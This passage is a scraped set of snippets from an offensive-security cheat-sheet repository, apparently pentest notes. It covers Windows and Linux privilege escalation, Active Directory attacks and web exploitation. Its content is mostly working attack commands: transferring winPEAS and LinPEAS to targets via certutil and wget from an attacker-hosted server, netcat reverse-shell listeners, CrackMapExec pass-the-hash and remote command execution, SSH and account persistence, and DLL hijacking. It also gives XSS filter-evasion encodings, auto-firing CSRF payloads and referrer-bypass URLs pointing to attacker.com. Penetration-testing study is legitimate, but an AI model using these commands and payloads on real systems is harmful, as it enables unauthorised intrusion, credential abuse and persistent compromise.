https://raw.githubusercontent.com/fashionproof/EnableAllTokenPrivs/master/EnableAllTokenPrivs.ps1 python -m http.server 80 ``` -------------------------------- ### Enum4Linux List All Options Source: https://github.com/hack-fast/hackfast/blob/main/docs/Offensive-Security/Active-Directory/Initial-Scanning-&-Enumeration/Tools/Linux/Enum4linux.md Displays all available command-line options and flags for Enum4Linux. This is useful for understanding the full capabilities of the tool. ```bash enum4linux -A [IP-ADDRESS] ``` ```bash enum4linux -u [USERNAME] -p [PASSWORD] -A [IP-ADDRESS] ``` -------------------------------- ### Host and Transfer WinPEAS for Weak Registry Hunting Source: https://github.com/hack-fast/hackfast/blob/main/docs/Offensive-Security/Windows-Environment/Privilege-Escalation/Service-Exploits/Weak-Registry-Permissions/Registry-Enumeration.md This section demonstrates hosting the WinPEAS executable on a Python HTTP server and then transferring it to a target machine using the certutil command. It also includes a systeminfo command to verify the target's architecture. ```bash python3 -m http.server 8000 ``` ```powershell systeminfo | findstr /B /C:"System Type" ``` ```powershell certutil -urlcache -f http://[IP-ADDRESS]:8000/winPEASx64.exe winPEASx64.exe ``` ```powershell .\winPEASx64.exe ``` -------------------------------- ### Start NTFS Transaction (C++) Source: https://github.com/hack-fast/hackfast/blob/main/docs/Offensive-Security/Windows-Environment/Establishing-Persistence/Process-Doppelgänging.md Initiates a new transaction on an NTFS volume, a prerequisite for transacted file operations. Requires administrative privileges. ```c HANDLE hTransaction = CreateTransaction(NULL, 0, 0, 0, 0, 0, NULL); ``` -------------------------------- ### Determine Exim Binary Version Source: https://github.com/hack-fast/hackfast/blob/main/docs/Offensive-Security/Linux-Environment/Privilege-Escalation/SUID-SGID-Executables/Exploiting-Vulnerable-SUID-Binaries.md Fetches the specific version of the Exim binary installed on the system. Knowing the version is essential for searching public exploit databases. ```bash /usr/sbin/exim-4.84-3 --version ``` -------------------------------- ### Enumerate Drupal Installations with Droopescan Source: https://github.com/hack-fast/hackfast/blob/main/docs/Offensive-Security/Web-Application/Common-Applications/cms/Drupal.md Droopescan is a security scanner that can identify Drupal installations and versions. This command initiates a scan targeting Drupal. ```bash droopescan scan drupal -u http://[DRUPAL-DOMAIN] ``` -------------------------------- ### List Installed Packages Source: https://github.com/hack-fast/hackfast/blob/main/docs/Offensive-Security/Linux-Environment/Privilege-Escalation/System-Enumeration.md Lists all installed Debian packages and filters the output to show packages related to 'package_name' in a case-insensitive manner. This is specific to Debian-based systems. ```shell dpkg -l | grep -i "package_name" ``` -------------------------------- ### Check Autostart Entries Source: https://github.com/hack-fast/hackfast/blob/main/docs/Offensive-Security/Windows-Environment/Privilege-Escalation/System-Enumeration.md Inspect registry keys that contain startup programs for all users and the current user. PowerShell provides a streamlined way to query these entries. ```cmd reg query HKLM\Software\Microsoft\Windows\CurrentVersion\Run ``` ```cmd reg query HKCU\Software\Microsoft\Windows\CurrentVersion\Run ``` ```powershell Get-ItemProperty -Path "HKLM:\Software\Microsoft\Windows\CurrentVersion\Run" ``` -------------------------------- ### Test SSH Access with Private Key Source: https://github.com/hack-fast/hackfast/blob/main/docs/Offensive-Security/Linux-Environment/Establishing-Persistence/SSH-PERSISTENCE.md Tests the SSH connection using the generated private key to confirm successful key-based authentication. ```bash ssh -i ~/.ssh/persistence_key user@target_machine ``` -------------------------------- ### Transfer LinPEAS Script to Target Source: https://github.com/hack-fast/hackfast/blob/main/docs/Offensive-Security/Linux-Environment/Pivoting-Tunneling-and-Port-Forwarding/Port-Forwarding/Enumeration.md Downloads the LinPEAS script from a specified IP address and port using 'wget'. This command is executed on the target machine. ```bash wget http://[IP-ADDRESS]:8000/linpeas.sh ``` -------------------------------- ### CrackMapExec Pass the Hash Source: https://github.com/hack-fast/hackfast/blob/main/docs/Offensive-Security/Active-Directory/Initial-Scanning-&-Enumeration/Tools/Linux/CrackMapExec.md Examples for performing 'Pass the Hash' attacks using CrackMapExec. Supports both local authentication and standard pass-the-hash with LM/NTLM hashes. ```bash crackmapexec smb [IP-ADDRESS]/24 -u [USERNAME] -H '[LMHASH:NTHASH]' --local-auth ``` ```bash crackmapexec smb [IP-ADDRESS]/24 -u [USERNAME] -H '[NTHASH]' ``` -------------------------------- ### Set up Netcat Listener Source: https://github.com/hack-fast/hackfast/blob/main/docs/Offensive-Security/Windows-Environment/Privilege-Escalation/Token-Impersonation/SeDebugPrivilege.md Starts a Netcat listener on a specified port to capture incoming reverse shell connections. The '-cAr' flags are used for raw, ASCII, and recursive listening. ```bash rlwrap -cAr nc -lnvp 9002 ``` -------------------------------- ### FreeRDP Connection Scenarios Source: https://github.com/hack-fast/hackfast/blob/main/docs/Offensive-Security/Network/ports/3389.md Demonstrates various FreeRDP connection scenarios including audio redirection, dynamic resolution, clipboard redirection, certificate ignoring, and shared directory mounting. ```bash xfreerdp /u:[USERNAME] /p:[PASSWORD] /v:[TARGET-IP] /sound:sys:alsa ``` ```bash xfreerdp /v:[TARGET-IP] /u:[USERNAME] /p:[PASSWORD] /dynamic-resolution ``` ```bash xfreerdp /v:[TARGET-IP] /u:[USERNAME] /p:[PASSWORD] +clipboard ``` ```bash xfreerdp /v:[TARGET-IP] /u:[USERNAME] /p:[PASSWORD] /cert:ignore ``` ```bash xfreerdp /v:[TARGET-IP] /u:[USERNAME] /p:[PASSWORD] /drive:path/to/directory,share_name ``` -------------------------------- ### Generate Password Hash with OpenSSL Source: https://github.com/hack-fast/hackfast/blob/main/docs/Offensive-Security/Linux-Environment/Establishing-Persistence/Add-Account.md Generates a hashed password using OpenSSL's MD5 crypt algorithm. Requires a salt and the desired password as input. The output is a string suitable for use in the /etc/passwd file. ```bash openssl passwd -1 -salt [SALT] [PASSWORD] ``` -------------------------------- ### Installed Hotfixes (WMIC/PowerShell) Source: https://github.com/hack-fast/hackfast/blob/main/docs/Offensive-Security/Windows-Environment/Privilege-Escalation/System-Enumeration.md Lists installed Windows hotfixes (patches). 'wmic qfe list' uses the Windows Management Instrumentation Command-line, and 'Get-HotFix' is the PowerShell alternative. ```cmd wmic qfe list ``` ```powershell Get-HotFix ``` -------------------------------- ### Enumerate Drupal Installations with Nmap Source: https://github.com/hack-fast/hackfast/blob/main/docs/Offensive-Security/Web-Application/Common-Applications/cms/Drupal.md Nmap, a network scanner, can be used with the 'http-drupal-enum' script to enumerate Drupal installations. This script probes the web server for Drupal-specific indicators. ```bash nmap -sV --script http-drupal-enum --script-args http-drupal-enum.basepath=/ http://[DRUPAL-DOMAIN] ``` -------------------------------- ### Upload Files via SMB (With Credentials) Source: https://github.com/hack-fast/hackfast/blob/main/docs/Offensive-Security/Windows-Environment/File-Transfer/Upload-Operations.md Explains how to upload files using SMB with authentication. It covers configuring the SMB server with credentials and mapping the network drive accordingly. ```bash sudo impacket-smbserver hackfast $(pwd) -smb2support -user hackfast -password hackfast ``` ```bash smbserver.py share . -smb2support -username hackfast -password hackfast ``` ```bash net use z: \[IP-ADDRESS]\hackfast /user:hackfast hackfast ``` ```bash copy file.txt z:\file.txt ``` -------------------------------- ### Execute Target Application (Command Line) Source: https://github.com/hack-fast/hackfast/blob/main/docs/Offensive-Security/Windows-Environment/Establishing-Persistence/DLL-Hijacking.md This command executes the target application. If the malicious DLL has been placed correctly, the application will load it, executing the code within the DLL. ```bash start "" "C:\\Path\\To\\Target\\Application\\Application.exe" ``` -------------------------------- ### Unicode and HTML Encoding Examples Source: https://github.com/hack-fast/hackfast/blob/main/docs/Offensive-Security/Web-Application/Web-Exploit/Injections/Client-Side-Injections/XSS.md Provides examples of obfuscating JavaScript payloads using Unicode escape sequences and HTML entities. These methods can bypass filters that look for plain text keywords. ```javascript alert(1) ``` ```javascript \u0061lert(1) ``` ```html &apos;-alert(1)-&apos; ``` -------------------------------- ### CrackMapExec Target Formatting Source: https://github.com/hack-fast/hackfast/blob/main/docs/Offensive-Security/Active-Directory/Initial-Scanning-&-Enumeration/Tools/Linux/CrackMapExec.md Examples of how to specify target IP addresses or ranges for CrackMapExec scans. Supports single IPs, IP ranges, CIDR notation, and targets from a file. ```bash crackmapexec smb [IP-ADDRESS-1] [IP-ADDRESS-2] ``` ```bash crackmapexec smb [IP-ADDRESS]-28 [IP-ADDRESS]-67 ``` ```bash crackmapexec smb [IP-ADDRESS]/24 ``` ```bash crackmapexec smb targets.txt ``` -------------------------------- ### Initialize LXD with 'lxd init' Source: https://github.com/hack-fast/hackfast/blob/main/docs/Offensive-Security/Linux-Environment/Privilege-Escalation/Service-Based/LXD.md Initializes the LXD daemon, prompting the user for configuration details necessary to set up the container environment. ```bash lxd init ``` -------------------------------- ### Start HTTP Server with Python Source: https://github.com/hack-fast/hackfast/blob/main/docs/Offensive-Security/Linux-Environment/Privilege-Escalation/Service-Based/Cron-Jobs/Hunting-Cron-Jobs.md Starts a simple HTTP server on the current directory using Python 3. This is commonly used to serve files, such as the LinPEAS script, to a target machine. ```python python3 -m http.server 80 ``` -------------------------------- ### BloodHound: Data Collection with SharpHound Source: https://github.com/hack-fast/hackfast/blob/main/docs/Offensive-Security/Active-Directory/Initial-Scanning-&-Enumeration/Credentialed-Enumeration/From-Windows.md Illustrates the process of collecting Active Directory data using SharpHound for analysis in BloodHound, including data ingestion and analysis steps. ```bash .\SharpHound.exe -c All --zipfilename "output.zip" ``` -------------------------------- ### CrackMapExec Command Execution Source: https://github.com/hack-fast/hackfast/blob/main/docs/Offensive-Security/Active-Directory/Initial-Scanning-&-Enumeration/Tools/Linux/CrackMapExec.md Examples for executing commands remotely on target systems using CrackMapExec. Demonstrates execution via cmd.exe, PowerShell, and forcing specific execution methods like smbexec. ```bash crackmapexec smb [IP-ADDRESS] -u '[USERNAME]' -p '[PASSWORD]' -x 'whoami' ``` ```bash crackmapexec smb [IP-ADDRESS] -u '[USERNAME]' -p '[PASSWORD]' -x 'net user Administrator /domain' --exec-method smbexec ``` ```bash crackmapexec smb [IP-ADDRESS] -u [USERNAME] -p '[PASSWORD]' -X 'whoami' ``` -------------------------------- ### List Loaded DLLs for Processes (Cmd/PowerShell) Source: https://github.com/hack-fast/hackfast/blob/main/docs/Offensive-Security/Windows-Environment/Privilege-Escalation/System-Enumeration.md Displays the Dynamic Link Libraries (DLLs) loaded by running processes. 'tasklist /m' uses the command prompt, while 'Get-Process | Select-Object Name, Modules' leverages PowerShell for a more structured output. ```cmd tasklist /m ``` ```powershell Get-Process | Select-Object Name, Modules ``` -------------------------------- ### Gather Service Details using PowerShell Get-WmiObject Source: https://github.com/hack-fast/hackfast/blob/main/docs/Offensive-Security/Windows-Environment/Privilege-Escalation/Service-Exploits/Insecure-Service-Permissions/Service-Enumeration.md Retrieves comprehensive information about a specified service, including its name, display name, start mode, state, binary path, and start name. ```powershell Get-WmiObject win32_service | ?{$_.Name -like 'daclsvc'} | select Name, DisplayName, StartMode, State, PathName, StartName ``` -------------------------------- ### Download SharpUp Executable Source: https://github.com/hack-fast/hackfast/blob/main/docs/Offensive-Security/Windows-Environment/Privilege-Escalation/Service-Exploits/Insecure-Permissions-Executable/Service-Enumeration.md Downloads the SharpUp.exe executable from GitHub using wget. SharpUp is used for identifying Windows service misconfigurations. ```shell wget https://raw.githubusercontent.com/r3motecontrol/Ghostpack-CompiledBinaries/master/SharpUp.exe ``` -------------------------------- ### Start Metasploit SOCKS Proxy Source: https://github.com/hack-fast/hackfast/blob/main/docs/Offensive-Security/Linux-Environment/Pivoting-Tunneling-and-Port-Forwarding/Port-Forwarding/Meterpreter-Tunneling-&-Port-Forwarding.md Initiates a SOCKS proxy server using Metasploit's auxiliary module. This allows tunneling traffic through the Meterpreter session. ```msf use auxiliary/server/socks_proxy set SRVPORT 9050 set SRVHOST 0.0.0.0 set VERSION 4a run ``` -------------------------------- ### Regex Examples for Referrer Bypass Source: https://github.com/hack-fast/hackfast/blob/main/docs/Offensive-Security/Web-Application/Web-Bypassing/Bypassing-CSRF-Protection.md A collection of regular expression patterns used to illustrate various ways a referrer check can be bypassed. These examples highlight how subtle variations in URL structure can trick validation mechanisms. ```regex https://attacker.com?target.com https://attacker.com;target.com https://attacker.com/target.com/../targetPATH https://target.com.attacker.com https://attackertarget.com https://target.com@attacker.com https://attacker.com#target.com https://attacker.com\.target.com https://attacker.com/.target.com ``` -------------------------------- ### Download PowerUp Script Source: https://github.com/hack-fast/hackfast/blob/main/docs/Offensive-Security/Windows-Environment/Privilege-Escalation/Service-Exploits/Unquoted-Service-Paths/Service-Hunting.md Downloads the PowerUp PowerShell script from GitHub using wget. ```bash wget https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/master/Privesc/PowerUp.ps1 ``` -------------------------------- ### Get Detailed System Information (PowerShell) Source: https://github.com/hack-fast/hackfast/blob/main/docs/Offensive-Security/Windows-Environment/Privilege-Escalation/System-Enumeration.md Retrieves comprehensive system information using a single PowerShell cmdlet. This provides details about the computer's hardware, OS version, and configuration. ```powershell Get-ComputerInfo ``` -------------------------------- ### Get User Information Source: https://github.com/hack-fast/hackfast/blob/main/docs/Offensive-Security/Windows-Environment/Privilege-Escalation/System-Enumeration.md Retrieve current user, list all user accounts, show RDP session users, list administrators, and get detailed user account information. Includes both command-line and PowerShell methods. ```cmd whoami ``` ```cmd net user ``` ```cmd query user ``` ```cmd net localgroup administrators ``` ```powershell Get-LocalUser ``` ```powershell Get-LocalGroupMember -Group "Administrators" ``` ```powershell Get-WmiObject -Class Win32_UserAccount ``` -------------------------------- ### JSON GET Request for CSRF Source: https://github.com/hack-fast/hackfast/blob/main/docs/Offensive-Security/Web-Application/Web-Exploit/Injections/Client-Side-Injections/CSRF.md A JavaScript snippet using XMLHttpRequest to send a GET request. Modern browsers may block this due to CORS policies, but it demonstrates a potential CSRF vector. ```javascript <!-- Can be detected and blocked by modern browsers due to CORS policy --> <script> var xhr = new XMLHttpRequest(); xhr.open("GET", "http://[DOMAIN_NAME]/endpoint"); xhr.send(); </script> ``` -------------------------------- ### GET Request Triggered Automatically for CSRF Source: https://github.com/hack-fast/hackfast/blob/main/docs/Offensive-Security/Web-Application/Web-Exploit/Injections/Client-Side-Injections/CSRF.md An HTML image tag that automatically sends a GET request when the page loads, exploiting CSRF vulnerabilities without requiring direct user interaction. ```html <!-- Automatically triggers when the page loads --> <img src="http://[DOMAIN_NAME]/endpoint?parameter=CSRFd" alt="img"> ``` -------------------------------- ### Simple GET Request to Trigger CSRF Source: https://github.com/hack-fast/hackfast/blob/main/docs/Offensive-Security/Web-Application/Web-Exploit/Injections/Client-Side-Injections/CSRF.md A basic HTML link that, when clicked by a user, sends a GET request to a target endpoint. This can be used in CSRF attacks if the endpoint performs sensitive actions. ```html <!-- Direct user interaction required --> <a href="http://[DOMAIN_NAME]/endpoint?parameter=CSRFd">Click here to view!</a> ```